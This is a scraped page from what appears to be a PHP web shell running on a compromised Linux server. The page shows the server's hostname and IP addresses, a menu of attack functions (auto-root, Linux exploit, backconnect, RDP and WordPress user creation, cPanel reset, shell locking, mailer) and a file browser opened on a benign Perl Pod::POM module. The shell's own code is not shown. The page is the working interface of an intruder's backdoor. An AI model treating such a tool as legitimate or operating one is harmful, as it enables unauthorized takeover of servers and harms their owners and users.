Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Pod /
POM /
Node /
[ HOME SHELL ]
Name
Size
Permission
Action
Begin.pm
1.48
KB
-rw-r--r--
Code.pm
1.5
KB
-rw-r--r--
Content.pm
1.59
KB
-rw-r--r--
For.pm
1.55
KB
-rw-r--r--
Head1.pm
1.68
KB
-rw-r--r--
Head2.pm
1.67
KB
-rw-r--r--
Head3.pm
1.67
KB
-rw-r--r--
Head4.pm
1.66
KB
-rw-r--r--
Item.pm
1.65
KB
-rw-r--r--
Over.pm
1.86
KB
-rw-r--r--
Pod.pm
1.44
KB
-rw-r--r--
Sequence.pm
2.27
KB
-rw-r--r--
Text.pm
1.92
KB
-rw-r--r--
Verbatim.pm
1.54
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Pod.pm
#============================================================= -*-Perl-*- # # Pod::POM::Node::Pod # # DESCRIPTION # Module implementing specific nodes in a Pod::POM, subclassed from # Pod::POM::Node. # # AUTHOR # Andy Wardley <abw@kfs.org> # Andrew Ford <a.ford@ford-mason.co.uk> # # COPYRIGHT # Copyright (C) 2000, 2001 Andy Wardley. All Rights Reserved. # Copyright (C) 2009 Andrew Ford. All Rights Reserved. # # This module is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. # # REVISION # $Id: Pod.pm 76 2009-08-20 20:41:33Z ford $ # #======================================================================== package Pod::POM::Node::Pod; use strict; use parent qw( Pod::POM::Node ); use vars qw( @ACCEPT $ERROR ); @ACCEPT = qw( head1 head2 head3 head4 over begin for text verbatim code ); 1; =head1 NAME Pod::POM::Node::Pod - =head1 SYNOPSIS use Pod::POM::Nodes; =head1 DESCRIPTION This module implements a specialization of the node class to represent C<=pod> elements. =head1 AUTHOR Andrew Ford E<lt>a.ford@ford-mason.co.ukE<gt> Andy Wardley E<lt>abw@kfs.orgE<gt> =head1 COPYRIGHT Copyright (C) 2000, 2001 Andy Wardley. All Rights Reserved. Copyright (C) 2009 Andrew Ford. All Rights Reserved. This module is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =head1 SEE ALSO Consult L<Pod::POM::Node> for a discussion of nodes.
Close